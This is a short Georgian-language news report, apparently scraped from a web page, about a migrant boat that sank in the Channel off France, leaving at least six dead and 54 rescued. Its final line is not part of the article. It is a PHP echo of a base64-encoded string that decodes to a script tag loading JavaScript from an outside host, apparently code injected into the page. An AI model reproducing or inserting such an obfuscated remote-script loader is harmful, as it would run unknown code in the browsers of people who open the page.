celsiusi
ავერსი შნაიდერი

საფრანგეთში მიგრანტების ნავი ჩაიძირა, დაღუპულია სულ მცირე ექვსი ადამიანი. ინფორმაციას „როიტერი“ ავრცელებს.

ადგილობრივმა მერმა, ფრანკ დარსინმა განაცხადა, რომ ფართომასშტაბიანი სამაშველო ოპერაცია ადგილობრივი დროით 06:00 საათზე დაიწყო.

საზღვაო პრეფექტურამ დაადასტურა, რომ სულ მცირე ექვსი ადამიანი დაიღუპა და განაცხადეს, რომ სამძებრო-სამაშველო ოპერაციები ამ დრომდე მიმდინარეობს.

როგორც მედია წერს, არხი საფრანგეთსა და ბრიტანეთს შორის, რომლის გადაკვეთასაც ნავი ცდილობდა, არის მსოფლიოში ერთ-ერთი ყველაზე დატვირთული სატრანსპორტო ხაზი, სადაც ძლიერი დინებაა, რაც პატარა გემებით გადაკვეთასას სახიფათოა.

„ჩვენ გადავარჩინეთ 54 ადამიანი, მათ შორის ერთი ქალი“, – თქვა ენ თორელმა, მოხალისემ, რომელიც ერთ-ერთ სამაშველო ნავზე იმყოფებოდა.

საფრანგეთის პრემიერ-მინისტრმა, ელიზაბეტ ბორნმა განაცხადა, რომ საზღვაო საქმეთა უმცროსი მინისტრი ჰერვე ბერვილი გაემგზავრება შემთხვევის ადგილას და აღნიშნა, რომ მისი ფიქრები დაზარალებულთა გვერდითაა.

დიდი ბრიტანეთის სანაპირო დაცვამ განაცხადა, რომ მათ გაგზავნეს სამაშველო ნავი, სანაპირო დაცვის სამაშველო ჯგუფთან და სასწრაფო დახმარების პერსონალთან ერთად.

ცნობისთვის, დიდი ბრიტანეთის მთავრობის მონაცემები აჩვენებს, რომ 2018 წლის დასაწყისიდან მიგრანტების არხის გადაკვეთის რაოდენობამ 100 000-ს გადააჭარბა. ეს რიცხვი ამ წელში დაახლოებით 16 000-ია.

233
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");